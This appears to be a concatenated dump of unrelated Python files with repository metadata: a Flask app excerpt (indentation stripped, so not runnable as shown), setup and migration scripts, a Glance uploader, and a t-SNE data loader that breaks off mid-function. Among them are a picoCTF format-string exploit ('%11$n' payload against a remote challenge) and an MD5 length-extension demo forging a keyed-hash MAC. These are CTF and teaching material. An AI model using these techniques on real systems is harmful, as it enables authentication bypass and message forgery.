# otherwise we raise it from here.
if error is exc_value:
reraise(exc_type, exc_value, tb)
raise error
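    # Example (illustrative, not part of the original source; the URL is a
    # placeholder): fall back to an external site when URL building fails.
    #
    #     def external_url_handler(error, endpoint, values):
    #         return 'https://builds.example.com/' + endpoint
    #
    #     app.url_build_error_handlers.append(external_url_handler)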
def preprocess_request(self):
"""Called before the request is dispatched. Calls
:attr:`url_value_preprocessors` registered with the app and the
current blueprint (if any). Then calls :attr:`before_request_funcs`
registered with the app and the blueprint.
If any :meth:`before_request` handler returns a non-None value, the
value is handled as if it was the return value from the view, and
further request handling is stopped.
"""
bp = _request_ctx_stack.top.request.blueprint
funcs = self.url_value_preprocessors.get(None, ())
if bp is not None and bp in self.url_value_preprocessors:
funcs = chain(funcs, self.url_value_preprocessors[bp])
for func in funcs:
func(request.endpoint, request.view_args)
funcs = self.before_request_funcs.get(None, ())
if bp is not None and bp in self.before_request_funcs:
funcs = chain(funcs, self.before_request_funcs[bp])
for func in funcs:
rv = func()
if rv is not None:
return rv
def process_response(self, response):
"""Can be overridden in order to modify the response object
before it's sent to the WSGI server. By default this will
call all the :meth:`after_request` decorated functions.
.. versionchanged:: 0.5
As of Flask 0.5 the functions registered for after request
execution are called in reverse order of registration.
:param response: a :attr:`response_class` object.
:return: a new response object or the same, has to be an
instance of :attr:`response_class`.
"""
ctx = _request_ctx_stack.top
bp = ctx.request.blueprint
funcs = ctx._after_request_functions
if bp is not None and bp in self.after_request_funcs:
funcs = chain(funcs, reversed(self.after_request_funcs[bp]))
if None in self.after_request_funcs:
funcs = chain(funcs, reversed(self.after_request_funcs[None]))
for handler in funcs:
response = handler(response)
if not self.session_interface.is_null_session(ctx.session):
self.session_interface.save_session(self, ctx.session, response)
return response
def do_teardown_request(self, exc=_sentinel):
"""Called after the request is dispatched and the response is
returned, right before the request context is popped.
This calls all functions decorated with
:meth:`teardown_request`, and :meth:`Blueprint.teardown_request`
if a blueprint handled the request. Finally, the
:data:`request_tearing_down` signal is sent.
This is called by
:meth:`RequestContext.pop() <flask.ctx.RequestContext.pop>`,
which may be delayed during testing to maintain access to
resources.
:param exc: An unhandled exception raised while dispatching the
request. Detected from the current exception information if
not passed. Passed to each teardown function.
.. versionchanged:: 0.9
Added the ``exc`` argument.
"""
if exc is _sentinel:
exc = sys.exc_info()[1]
funcs = reversed(self.teardown_request_funcs.get(None, ()))
bp = _request_ctx_stack.top.request.blueprint
if bp is not None and bp in self.teardown_request_funcs:
funcs = chain(funcs, reversed(self.teardown_request_funcs[bp]))
for func in funcs:
func(exc)
request_tearing_down.send(self, exc=exc)
def do_teardown_appcontext(self, exc=_sentinel):
"""Called right before the application context is popped.
When handling a request, the application context is popped
after the request context. See :meth:`do_teardown_request`.
This calls all functions decorated with
:meth:`teardown_appcontext`. Then the
:data:`appcontext_tearing_down` signal is sent.
This is called by
:meth:`AppContext.pop() <flask.ctx.AppContext.pop>`.
.. versionadded:: 0.9
"""
if exc is _sentinel:
exc = sys.exc_info()[1]
for func in reversed(self.teardown_appcontext_funcs):
func(exc)
appcontext_tearing_down.send(self, exc=exc)
def app_context(self):
"""Create an :class:`~flask.ctx.AppContext`. Use as a ``with``
block to push the context, which will make :data:`current_app`
point at this application.
An application context is automatically pushed by
:meth:`RequestContext.push() <flask.ctx.RequestContext.push>`
when handling a request, and when running a CLI command. Use
this to manually create a context outside of these situations.
::
with app.app_context():
init_db()
See :doc:`/appcontext`.
.. versionadded:: 0.9
"""
return AppContext(self)
def request_context(self, environ):
"""Create a :class:`~flask.ctx.RequestContext` representing a
WSGI environment. Use a ``with`` block to push the context,
which will make :data:`request` point at this request.
See :doc:`/reqcontext`.
Typically you should not call this from your own code. A request
context is automatically pushed by the :meth:`wsgi_app` when
handling a request. Use :meth:`test_request_context` to create
an environment and context instead of this method.
:param environ: a WSGI environment
"""
return RequestContext(self, environ)
def test_request_context(self, *args, **kwargs):
"""Create a :class:`~flask.ctx.RequestContext` for a WSGI
environment created from the given values. This is mostly useful
during testing, where you may want to run a function that uses
request data without dispatching a full request.
See :doc:`/reqcontext`.
Use a ``with`` block to push the context, which will make
:data:`request` point at the request for the created
environment. ::
with test_request_context(...):
generate_report()
When using the shell, it may be easier to push and pop the
context manually to avoid indentation. ::
ctx = app.test_request_context(...)
ctx.push()
...
ctx.pop()
Takes the same arguments as Werkzeug's
:class:`~werkzeug.test.EnvironBuilder`, with some defaults from
the application. See the linked Werkzeug docs for most of the
available arguments. Flask-specific behavior is listed here.
:param path: URL path being requested.
:param base_url: Base URL where the app is being served, which
``path`` is relative to. If not given, built from
:data:`PREFERRED_URL_SCHEME`, ``subdomain``,
:data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`.
:param subdomain: Subdomain name to append to
:data:`SERVER_NAME`.
:param url_scheme: Scheme to use instead of
:data:`PREFERRED_URL_SCHEME`.
:param data: The request body, either as a string or a dict of
form keys and values.
:param json: If given, this is serialized as JSON and passed as
``data``. Also defaults ``content_type`` to
``application/json``.
:param args: other positional arguments passed to
:class:`~werkzeug.test.EnvironBuilder`.
:param kwargs: other keyword arguments passed to
:class:`~werkzeug.test.EnvironBuilder`.
"""
from flask.testing import make_test_environ_builder
builder = make_test_environ_builder(self, *args, **kwargs)
try:
return self.request_context(builder.get_environ())
finally:
builder.close()
def wsgi_app(self, environ, start_response):
"""The actual WSGI application. This is not implemented in
:meth:`__call__` so that middlewares can be applied without
losing a reference to the app object. Instead of doing this::
app = MyMiddleware(app)
It's a better idea to do this instead::
app.wsgi_app = MyMiddleware(app.wsgi_app)
Then you still have the original application object around and
can continue to call methods on it.
.. versionchanged:: 0.7
Teardown events for the request and app contexts are called
even if an unhandled error occurs. Other events may not be
called depending on when an error occurs during dispatch.
See :ref:`callbacks-and-errors`.
:param environ: A WSGI environment.
:param start_response: A callable accepting a status code,
a list of headers, and an optional exception context to
start the response.
"""
ctx = self.request_context(environ)
error = None
try:
try:
ctx.push()
response = self.full_dispatch_request()
except Exception as e:
error = e
response = self.handle_exception(e)
except:
error = sys.exc_info()[1]
raise
return response(environ, start_response)
finally:
if self.should_ignore_error(error):
error = None
ctx.auto_pop(error)
def __call__(self, environ, start_response):
"""The WSGI server calls the Flask application object as the
        WSGI application. This calls :meth:`wsgi_app`, which can be
        wrapped to apply middleware."""
return self.wsgi_app(environ, start_response)
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.name,
)
| [
"[email protected]"
] | |
3daa552b34b92a1091491956c4ea13bf7738ada2 | c48a8d16b609f51ec28ce735d69b3e71480d5fe3 | /setup.py | bd5d830002ab82263ac25476fc7a82022a8d8806 | [] | no_license | arii/pyrltools | c6d622761b7868a72e60c6cb5d35dbae2de1ffe1 | 45df3ecd4227529f3ce40fc9132c5dc42920fc5c | refs/heads/master | 2021-01-18T05:00:58.103484 | 2014-10-16T00:18:14 | 2014-10-16T00:18:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #from numpy.distutils.core import setup, Extension
from setuptools import setup, Extension, find_packages
import numpy
setup(name='rltools',
      version='0.1',
      include_dirs=[numpy.get_include(), '/usr/include'],
      packages=find_packages())
| [
"[email protected]"
] | |
15b30860d116d827c4c3de9db43e689dffc3d70f | 6c6531b6f93817a2720ff9b78fce6ad4d5bb500c | /PericiasMedicas/company/migrations/0007_auto_20191230_1711.py | 5603642c2f74d64ccb13c8e644b23e6a6f6f2902 | [] | no_license | massariolmc/periciasmedicas | 6d3c142a5f5e308b049d57b30d698526c8aecda3 | 9b5b0e192bf51bb1b297f0983b2a0ab0c24b31b1 | refs/heads/master | 2022-12-08T11:13:10.981476 | 2020-02-21T23:32:44 | 2020-02-21T23:32:44 | 235,667,801 | 0 | 0 | null | 2022-11-22T05:15:44 | 2020-01-22T21:12:16 | JavaScript | UTF-8 | Python | false | false | 472 | py | # Generated by Django 2.2.7 on 2019-12-30 21:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0006_auto_20191230_1629'),
]
operations = [
migrations.AlterField(
model_name='company',
name='state_registration',
field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='Inscrição Estadual'),
),
]
| [
"[email protected]"
] | |
b03184fca3a98c1dcef9e6620aab908a13251857 | c883f6029e05bffa8b34795d017bdcd2975fdc31 | /venv/Scripts/conch-script.py | 103a4e88c1d8e9ad5f3b7b6a22e01b2a6baec516 | [] | no_license | Solin1998/AnalyzeGdeltData | be54ee71db375dc70b9da7f067215adb4c44f2d4 | 0e2e340fbbb1af4708edce11e034ccd0ee9c0e4d | refs/heads/master | 2020-05-15T17:21:04.497117 | 2019-05-16T01:53:30 | 2019-05-16T01:53:30 | 182,401,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | #!D:\scrapy_gdelt\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'Twisted==19.2.0','console_scripts','conch'
__requires__ = 'Twisted==19.2.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Twisted==19.2.0', 'console_scripts', 'conch')()
)
| [
"[email protected]"
] | |
6035dce05ab1ceb238455998bedfa82823ff466e | 3471728291ab015e6780763218f96a369897f5c4 | /imagefactory_plugins/OpenStack/glance_upload.py | c2b28347f49d65700b6205043a0e6637b27930f4 | [
"Apache-2.0"
] | permissive | zyga/imagefactory | 913fb4a987a746cff72f3074e0e338e896ac2e65 | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | refs/heads/master | 2020-03-24T07:33:43.270977 | 2018-06-26T19:37:55 | 2018-06-26T19:37:55 | 142,568,326 | 1 | 0 | Apache-2.0 | 2018-07-27T11:20:36 | 2018-07-27T11:20:36 | null | UTF-8 | Python | false | false | 1,452 | py | # Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glance import client as glance_client
from pprint import pprint
def glance_upload(image_filename, creds = {'auth_url': None, 'password': None, 'strategy': 'noauth', 'tenant': None, 'username': None},
host = "0.0.0.0", port = "9292", token = None):
image_meta = {'container_format': 'bare',
'disk_format': 'qcow2',
'is_public': True,
'min_disk': 0,
'min_ram': 0,
'name': 'Factory Test Image',
'properties': {'distro': 'rhel'}}
c = glance_client.Client(host=host, port=port,
auth_tok=token, creds=creds)
image_data = open(image_filename, "r")
image_meta = c.add_image(image_meta, image_data)
image_data.close()
return image_meta['id']
image_id = glance_upload("/root/base-image-f19e3f9b-5905-4b66-acb2-2e25395fdff7.qcow2")
print image_id
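# A minimal sketch of an authenticated call (illustrative, not part of the
# original script; host, port and credential values are placeholders for a
# keystone-style setup):
#
# image_id = glance_upload(
#     "/path/to/image.qcow2",
#     creds={'auth_url': 'http://127.0.0.1:5000/v2.0/', 'strategy': 'keystone',
#            'username': 'admin', 'password': 'secret', 'tenant': 'admin'},
#     host="127.0.0.1", port="9292")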
| [
"[email protected]"
] | |
1946bfe1caf51887dc9a1fb940cb12a1a1f3c769 | 11424be5ccc50cef7b421c01be8fbdf0e9a6df16 | /AY2021/attacks/LengthExtension/live/length_extension_md5_live.py | b1d6612a6e266c2a7a2ee96f65c26065210df06b | [] | no_license | MarcoSapio/cryptography-03lpyov-exercises | 1ff7b6e189af9bc4af4a85690b1f3ecbcb96527d | b9234c3a88f6e43def61fcad4acbfcc3ced03068 | refs/heads/master | 2023-05-27T00:25:46.641506 | 2021-06-10T14:08:40 | 2021-06-10T14:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,288 | py | #!/usr/bin/env python3
#
# Derived from:
#
# MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
#
# Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
# rights reserved.
#
# License to copy and use this software is granted provided that it
# is identified as the "RSA Data Security, Inc. MD5 Message-Digest
# Algorithm" in all material mentioning or referencing this software
# or this function.
#
# License is also granted to make and use derivative works provided
# that such works are identified as "derived from the RSA Data
# Security, Inc. MD5 Message-Digest Algorithm" in all material
# mentioning or referencing the derived work.
#
# RSA Data Security, Inc. makes no representations concerning either
# the merchantability of this software or the suitability of this
# software for any particular purpose. It is provided "as is"
# without express or implied warranty of any kind.
#
# These notices must be retained in any copies of any part of this
# documentation and/or software.
__doc__ = """pymd5 module - The MD5 hash function in pure Python.
md5(string='', state=None, count=0) - Returns a new md5 object and
processes string. Optional advanced parameters allow you to
resume an earlier computation by setting the internal state of
the function and the counter of message bits processed so far.
Most of the interface matches Python's standard hashlib.
md5 objects have these methods and attributes:
- update(arg): Update the md5 object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- digest_size: The size of the resulting hash in bytes (16).
- block_size: The internal block size of the hash algorithm in bytes (64).
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import pymd5
>>> m = pymd5.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
More condensed:
>>> pymd5.md5("Nobody inspects the spammish repetition").hexdigest()
'bb649c83dd1ea5c9d9dec9a18df0ffe9'
The module also exposes two low-level methods to help with crypto
experiments:
- md5_compress(state, block): The MD5 compression function; returns a
new 16-byte state based on the 16-byte
previous state and a 512-byte message
block.
- padding(msg_bits): Generate the padding that should be appended
to the end of a message of the given size to
reach a multiple of the block size.
"""
# Constants for compression function.
S11 = 7
S12 = 12
S13 = 17
S14 = 22
S21 = 5
S22 = 9
S23 = 14
S24 = 20
S31 = 4
S32 = 11
S33 = 16
S34 = 23
S41 = 6
S42 = 10
S43 = 15
S44 = 21
PADDING = b"\x80" + 63 * b"\0"
# F, G, H and I: basic MD5 functions.
def F(x, y, z): return (((x) & (y)) | ((~x) & (z)))
def G(x, y, z): return (((x) & (z)) | ((y) & (~z)))
def H(x, y, z): return ((x) ^ (y) ^ (z))
def I(x, y, z): return ((y) ^ ((x) | (~z)))
def ROTATE_LEFT(x, n):
x = x & 0xffffffff # make shift unsigned
return (((x) << (n)) | ((x) >> (32 - (n)))) & 0xffffffff
# FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
# Rotation is separate from addition to prevent recomputation.
def FF(a, b, c, d, x, s, ac):
a = a + F((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def GG(a, b, c, d, x, s, ac):
a = a + G((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def HH(a, b, c, d, x, s, ac):
a = a + H((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def II(a, b, c, d, x, s, ac):
a = a + I((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
class md5(object):
digest_size = 16 # size of the resulting hash in bytes
block_size = 64 # hash algorithm's internal block size
def __init__(self, string='', state=None, count=0):
"""md5(string='', state=None, count=0) - Return a new md5
hash object, optionally initialized to a given internal state
and count of message bits processed so far, then processes
string.
"""
self.count = 0
self.buffer = b""
if state is None:
# initial state defined by standard
self.state = (0x67452301,
0xefcdab89,
0x98badcfe,
0x10325476,) #128 bits ~ msg digest size
else:
self.state = _decode(state, md5.digest_size)
if count is not None:
self.count = count
if string:
self.update(string)
def update(self, input):
"""update(input) - Update the md5 object with the string
arg. Repeated calls are equivalent to a single call with the
concatenation of all the arguments.
"""
if not isinstance(input, bytes):
input = input.encode('utf-8')
inputLen = len(input)
index = int(self.count >> 3) & 0x3F
self.count = self.count + (inputLen << 3) # update number of bits
partLen = md5.block_size - index
# apply compression function to as many blocks as we have
if inputLen >= partLen:
self.buffer = self.buffer[:index] + input[:partLen]
self.state = md5_compress(self.state, self.buffer)
i = partLen
while i + 63 < inputLen:
self.state = md5_compress(self.state, input[i:i + md5.block_size])
i = i + md5.block_size
index = 0
else:
i = 0
# buffer remaining output
self.buffer = self.buffer[:index] + input[i:inputLen]
def digest(self):
"""digest() - Return the MD5 hash of the strings passed to the
update() method so far. This is a string of digest_size bytes
which may contain non-ASCII characters, including null bytes.
"""
_buffer, _count, _state = self.buffer, self.count, self.state
self.update(padding(self.count))
result = self.state
self.buffer, self.count, self.state = _buffer, _count, _state
return _encode(result, md5.digest_size)
def hexdigest(self):
"""hexdigest() - Like digest() except the hash value is
returned as a string of hexadecimal digits.
"""
return self.digest().hex()
## end of class
def padding(msg_bits):
"""padding(msg_bits) - Generates the padding that should be
appended to the end of a message of the given size to reach
a multiple of the block size."""
index = int((msg_bits >> 3) & 0x3f)
if index < 56:
padLen = (56 - index)
else:
padLen = (120 - index)
# (the last 8 bytes store the number of bits in the message)
return PADDING[:padLen] + _encode((msg_bits & 0xffffffff, msg_bits >> 32), 8)
def md5_compress(state, block):
"""md5_compress(state, block) - The MD5 compression function.
Outputs a 16-byte state based on a 16-byte previous state and a
512-byte message block.
"""
a, b, c, d = state
x = _decode(block, md5.block_size)
# Round
a = FF(a, b, c, d, x[0], S11, 0xd76aa478) # 1
d = FF(d, a, b, c, x[1], S12, 0xe8c7b756) # 2
c = FF(c, d, a, b, x[2], S13, 0x242070db) # 3
b = FF(b, c, d, a, x[3], S14, 0xc1bdceee) # 4
a = FF(a, b, c, d, x[4], S11, 0xf57c0faf) # 5
d = FF(d, a, b, c, x[5], S12, 0x4787c62a) # 6
c = FF(c, d, a, b, x[6], S13, 0xa8304613) # 7
b = FF(b, c, d, a, x[7], S14, 0xfd469501) # 8
a = FF(a, b, c, d, x[8], S11, 0x698098d8) # 9
d = FF(d, a, b, c, x[9], S12, 0x8b44f7af) # 10
c = FF(c, d, a, b, x[10], S13, 0xffff5bb1) # 11
b = FF(b, c, d, a, x[11], S14, 0x895cd7be) # 12
a = FF(a, b, c, d, x[12], S11, 0x6b901122) # 13
d = FF(d, a, b, c, x[13], S12, 0xfd987193) # 14
c = FF(c, d, a, b, x[14], S13, 0xa679438e) # 15
b = FF(b, c, d, a, x[15], S14, 0x49b40821) # 16
# Round 2
a = GG(a, b, c, d, x[1], S21, 0xf61e2562) # 17
d = GG(d, a, b, c, x[6], S22, 0xc040b340) # 18
c = GG(c, d, a, b, x[11], S23, 0x265e5a51) # 19
b = GG(b, c, d, a, x[0], S24, 0xe9b6c7aa) # 20
a = GG(a, b, c, d, x[5], S21, 0xd62f105d) # 21
d = GG(d, a, b, c, x[10], S22, 0x2441453) # 22
c = GG(c, d, a, b, x[15], S23, 0xd8a1e681) # 23
b = GG(b, c, d, a, x[4], S24, 0xe7d3fbc8) # 24
a = GG(a, b, c, d, x[9], S21, 0x21e1cde6) # 25
d = GG(d, a, b, c, x[14], S22, 0xc33707d6) # 26
c = GG(c, d, a, b, x[3], S23, 0xf4d50d87) # 27
b = GG(b, c, d, a, x[8], S24, 0x455a14ed) # 28
a = GG(a, b, c, d, x[13], S21, 0xa9e3e905) # 29
d = GG(d, a, b, c, x[2], S22, 0xfcefa3f8) # 30
c = GG(c, d, a, b, x[7], S23, 0x676f02d9) # 31
b = GG(b, c, d, a, x[12], S24, 0x8d2a4c8a) # 32
# Round 3
a = HH(a, b, c, d, x[5], S31, 0xfffa3942) # 33
d = HH(d, a, b, c, x[8], S32, 0x8771f681) # 34
c = HH(c, d, a, b, x[11], S33, 0x6d9d6122) # 35
b = HH(b, c, d, a, x[14], S34, 0xfde5380c) # 36
a = HH(a, b, c, d, x[1], S31, 0xa4beea44) # 37
d = HH(d, a, b, c, x[4], S32, 0x4bdecfa9) # 38
c = HH(c, d, a, b, x[7], S33, 0xf6bb4b60) # 39
b = HH(b, c, d, a, x[10], S34, 0xbebfbc70) # 40
a = HH(a, b, c, d, x[13], S31, 0x289b7ec6) # 41
d = HH(d, a, b, c, x[0], S32, 0xeaa127fa) # 42
c = HH(c, d, a, b, x[3], S33, 0xd4ef3085) # 43
b = HH(b, c, d, a, x[6], S34, 0x4881d05) # 44
a = HH(a, b, c, d, x[9], S31, 0xd9d4d039) # 45
d = HH(d, a, b, c, x[12], S32, 0xe6db99e5) # 46
c = HH(c, d, a, b, x[15], S33, 0x1fa27cf8) # 47
b = HH(b, c, d, a, x[2], S34, 0xc4ac5665) # 48
# Round 4
a = II(a, b, c, d, x[0], S41, 0xf4292244) # 49
d = II(d, a, b, c, x[7], S42, 0x432aff97) # 50
c = II(c, d, a, b, x[14], S43, 0xab9423a7) # 51
b = II(b, c, d, a, x[5], S44, 0xfc93a039) # 52
a = II(a, b, c, d, x[12], S41, 0x655b59c3) # 53
d = II(d, a, b, c, x[3], S42, 0x8f0ccc92) # 54
c = II(c, d, a, b, x[10], S43, 0xffeff47d) # 55
b = II(b, c, d, a, x[1], S44, 0x85845dd1) # 56
a = II(a, b, c, d, x[8], S41, 0x6fa87e4f) # 57
d = II(d, a, b, c, x[15], S42, 0xfe2ce6e0) # 58
c = II(c, d, a, b, x[6], S43, 0xa3014314) # 59
b = II(b, c, d, a, x[13], S44, 0x4e0811a1) # 60
a = II(a, b, c, d, x[4], S41, 0xf7537e82) # 61
d = II(d, a, b, c, x[11], S42, 0xbd3af235) # 62
c = II(c, d, a, b, x[2], S43, 0x2ad7d2bb) # 63
b = II(b, c, d, a, x[9], S44, 0xeb86d391) # 64
return (0xffffffff & (state[0] + a),
0xffffffff & (state[1] + b),
0xffffffff & (state[2] + c),
0xffffffff & (state[3] + d),)
import struct, string
def _encode(input, len):
k = len // 4
res = struct.pack("<%iI" % k, *(list(input[:k])))
return res
def _decode(input, len):
k = len // 4
res = struct.unpack("<%iI" % k, input[:len])
return list(res)
def test(input=""):
"""test(input): displays results of input hashed with our md5
function and the standard Python hashlib implementation
"""
print(md5(input).hexdigest())
import hashlib
print(hashlib.md5(input.encode('utf-8')).hexdigest())
if __name__ == "__main__":
# test("crypt")
# secret = b'this is a secret' # 256 bit
# MAC = edc707dda43b36386f36052b3446941f
# message is b'ciao'
# keyed-digest k || message --> MAC = m
# starting from m --> we build keyed-digest(message||additional_data) without knowing k
test_secret = b'my test secret'
message = b'ciao' # public data (we are considering integrity, not confidentiality)
to_add = b' ciao'
#
# message + something_else --> without knowing the secret we want to compute the MAC of message + something_else
m = md5()
m.update(test_secret+message)
print(m.hexdigest())
known_MAC = m.digest() # --> adding the padding
print("state =",end=' ')
print(m.state)
print(m.digest())
print("encode =" + str(_encode(m.state,md5.digest_size)))
print("decode =" + str(_decode(m.digest(), md5.digest_size)))
    # m.state  --> internal state after hashing secret+message (no padding)
    # m.digest --> MD5(secret + message + padding)
    # the known MAC of secret+message seeds the forged computation below
    # this is the length extension attack
    m2 = md5(state=known_MAC, count = 512)  # resume from the MAC; 512 = bits of secret+message+padding (one 64-byte block)
m2.update(to_add)
print(m2.hexdigest())
#m2.hexdigest() should be the digest of test_secret + message + to_add
m3 = md5()
pad = padding(len(test_secret+message)*8)
m3.update(test_secret+message+ pad + to_add) # padding len(test_secret+message+ pad + to_add)
print(m3.hexdigest())
m4 = md5()
print(m.state)
| [
"[email protected]"
] | |
139b190ed31d88e56031de11be07c1f4fe9af5b7 | 9785b5c8b997bc0241e8520b77bc7078d4c29029 | /2018/picoctf/authenticate/exp.py | 83476da0dbc034dd4f749350c757a078311fe650 | [] | no_license | lucyoa/ctfs | 4619571201bece8d7a6545f0cdc8291c153b6ef2 | 0726ee26052eabc5ee854fd976d0905d40668e8d | refs/heads/master | 2020-07-31T01:49:00.736206 | 2020-06-25T19:46:53 | 2020-06-25T19:46:53 | 210,439,562 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | #!/usr/bin/env python
from pwn import *
# r = process("./auth")
r = remote("2018shell.picoctf.com", 52918)
r.recvuntil("Would you like to read the flag? (yes/no)\n")
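# Format-string exploit sketch (offsets taken from the original script, not
# re-verified against the binary): the 4 packed address bytes are printed
# first, then %11$n writes the number of bytes output so far (4) to that
# address -- presumably the program's "authenticated" flag at 0x804a04c.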
payload = (
p32(0x804a04c) +
"%11$n"
)
r.sendline(payload)
print(r.recvall())
r.close()
| [
"[email protected]"
] | |
88670494c7efdc1374cdfb661ffb1ffe4df35dbf | 50e8f9a4b25d543932d0a43656c12ec0b31fe87b | /random_seq.py | 00513e85ca16590a6737c09d71f90fbf6047b890 | [] | no_license | 1gnatov/NRSAAM | b95e5f5d621863e73117d3014c67dc34bf1de40b | 752cab91455bfcbda7f54f9f20bb336ea18daa02 | refs/heads/master | 2016-09-06T17:18:02.471806 | 2013-10-30T21:01:55 | 2013-10-30T21:01:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | """
idea = using lists of nuc_seq with separate nucl as lists ['G'], ['A'] etc.
each round we look at unamb nucl - count lenth of this letter in dict{'D'=[['A'],['G'], ['T'], ..}
and multiply starting lists to the len(dict['D']) and appending letter-lists from dict
at the end all lists are joining with ''.join()
restrictase = they have to be palindromes
[ [['C'], ['T'], ['C'], ['G'], ['G'], ['G']]
[['C'], ['C'], ['C'], ['G'], ['G'], ['G']]
[['C'], ['T'], ['C'], ['G'], ['A'], ['G']]
[['C'], ['C'], ['C'], ['G'], ['A'], ['G']]
]
"""
#nonstanddict = {['D']:[['G'], ['A'], ['T']], ['H']:[['A'], ['T'], ['C']], ['N']:[['G'], ['A'], ['T'], ['C']], ['S']:[['G'], ['C']], ['R']:[['G'], ['A']], ['W']:[['A'], ['T']], ['Y']:[['T'], ['C']]}
nstanddict = {'D':[['G'], ['A'], ['T']], 'H':[['A'], ['T'], ['C']], 'N':[['G'], ['A'], ['T'], ['C']], 'S':[['G'], ['C']], 'R':[['G'], ['A']], 'W':[['A'], ['T']], 'Y':[['T'], ['C']], 'A':['A'], 'G':['G'], 'C':['C'], 'T':['T']}
start_seq = 'CYCGRG'
def prepare_seq_list(string):
'''
converting 'AGTCAG' to [['A'], ['G'] ...] list
'''
result = []
for char in string:
result.append([char])
return result
start_list = prepare_seq_list(start_seq)
print start_list
import itertools
def multisequence(seq):
    # expand each ambiguity code into all concrete sequences (see docstring);
    # nstanddict values mix 'A' and ['A'], so normalize to plain letters first
    per_position = []
    for ch in seq:
        per_position.append([a if isinstance(a, str) else a[0] for a in nstanddict[ch]])
    return [''.join(combo) for combo in itertools.product(*per_position)]
res_list = multisequence(start_seq)
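# Expected output for 'CYCGRG' (itertools.product order): ['CTCGGG', 'CTCGAG', 'CCCGGG', 'CCCGAG']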
print res_list | [
"[email protected]"
] | |
a88bad32c4bc419dba4eec0c3f96db48fa505f5b | 149273fc2e0dd4b86f7eadc59a548e6caf154288 | /experiments/run_experiments_tSNE.py | 113b171133f943f80100d908c0283e27da55947a | [
"Apache-2.0"
] | permissive | Liyubov/PaCMAP | 65eadb48c45187a8c8515fb626fd2ad63af0f2b2 | 91479ba60737a47eaa57dbd52fcac155821e9269 | refs/heads/master | 2023-08-02T15:23:00.580215 | 2021-10-09T02:31:10 | 2021-10-09T02:31:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,478 | py | import FlowCal
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import manifold, datasets
from time import time
from MulticoreTSNE import MulticoreTSNE as TSNE
from sklearn.decomposition import PCA
from sklearn.datasets import make_swiss_roll, make_s_curve
def data_prep(data_path, dataset='MNIST', size=10000):
'''
This function loads the dataset as numpy array.
Input:
data_path: path of the folder you store all the data needed.
dataset: the name of the dataset.
size: the size of the dataset. This is useful when you only
want to pick a subset of the data
Output:
X: the dataset in numpy array
labels: the labels of the dataset.
'''
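    # e.g. X, labels = data_prep('../data', dataset='MNIST', size=10000)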
if dataset == 'MNIST':
X = np.load(data_path + '/mnist_images.npy', allow_pickle=True).reshape(70000, 28*28)
labels = np.load(data_path + '/mnist_labels.npy', allow_pickle=True)
elif dataset == 'FMNIST':
X = np.load(data_path + '/fmnist_images.npy', allow_pickle=True).reshape(70000, 28*28)
labels = np.load(data_path + '/fmnist_labels.npy', allow_pickle=True)
elif dataset == 'coil_20':
X = np.load(data_path + '/coil_20.npy', allow_pickle=True).reshape(1440, 128*128)
labels = np.load(data_path + '/coil_20_labels.npy', allow_pickle=True)
elif dataset == 'coil_100':
X = np.load(data_path + '/coil_100.npy', allow_pickle=True).reshape(7200, -1)
        labels = np.load(data_path + '/coil_100_labels.npy', allow_pickle=True)
elif dataset == 'mammoth':
with open(data_path + '/mammoth_3d.json', 'r') as f:
X = json.load(f)
X = np.array(X)
with open(data_path + '/mammoth_umap.json', 'r') as f:
labels = json.load(f)
labels = labels['labels']
labels = np.array(labels)
elif dataset == 'mammoth_50k':
with open(data_path + '/mammoth_3d_50k.json', 'r') as f:
X = json.load(f)
X = np.array(X)
labels = np.zeros(10)
elif dataset == 'Flow_cytometry':
X = FlowCal.io.FCSData(data_path + '/11-12-15_314.fcs')
labels = np.zeros(10)
elif dataset == 'Mouse_scRNA':
data = pd.read_csv(data_path + '/GSE93374_Merged_all_020816_BatchCorrected_LNtransformed_doubletsremoved_Data.txt', sep='\t')
X = data.to_numpy()
labels = pd.read_csv(data_path + '/GSE93374_cell_metadata.txt', sep='\t')
elif dataset == 'swiss_roll':
X, labels = make_swiss_roll(n_samples=size, random_state=20200202)
elif dataset == 's_curve':
X, labels = make_s_curve(n_samples=size, random_state=20200202)
elif dataset == 's_curve_hole':
